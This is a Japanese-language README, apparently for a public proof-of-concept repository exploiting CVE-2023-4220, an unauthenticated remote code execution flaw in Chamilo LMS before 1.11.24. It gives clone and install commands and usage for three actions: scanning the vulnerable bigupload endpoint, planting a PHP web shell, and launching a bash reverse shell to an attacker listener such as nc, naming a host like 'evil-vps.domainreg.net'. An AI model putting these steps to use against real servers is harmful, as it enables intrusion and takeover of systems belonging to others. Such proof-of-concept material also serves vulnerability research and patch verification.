
これは、CVE-2023-4220で説明されているChamiloのLMSソフトウェアのセキュリティ脆弱性を悪用するためのPythonで書かれたスクリプトです。
これは、CVE-2023-4220 で説明されている Chamilo LMS ソフトウェアのセキュリティ上の欠陥を悪用するために書かれた Python スクリプトです。本システムは 1.11.24 より前のバージョンで脆弱です。
リポジトリをローカルマシンにクローンし、pip を使用して依存関係をインストールします(virtualenv を使用して、これらのインストールをグローバルインストールから分離する環境を作成することを推奨します)。
git clone https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc cd chamilo-lms-unauthenticated-rce-poc pip install -r requirements.txt
スクリプトには、Chamilo のルートパス(例:**http://example.com/chamilo**、**http://example.com**、**http://chamilo.example.com**)を含む ターゲット URL と、実行するアクション(利用可能なアクションは scan、webshell、revshell の 3 つ)が必要です。
このアクションは、/main/inc/lib/javascript/bigupload/files/ エンドポイントにアクセスして、ターゲットが脆弱かどうかを確認します。
python3 main.py -u http://example.com/chamilo -a scan
このアクションは、脆弱なエンドポイントに PHP ウェブシェル ファイルを作成します。
python3 main.py -u http://example.com/chamilo -a webshell
このアクションは、bash リバースシェル ファイルを作成して実行します。そのために、まず前のアクションと同じ方法を使用して ウェブシェル を作成します。その後、いくつかのコマンドを実行して bash ファイルを作成し、実行します。nc やその他のユーティリティを使用して定義したポートでリスニングしていることを確認し、実際にリバース接続を取得してください。また、ホストは有効な 内部/パブリック IPv4(例:172.17.1.4 や 186.227.4.31)か、登録済みのドメイン(例:evil-vps.domainreg.net)である必要があります。
python3 main.py -u http://example.com/chamilo -a revshell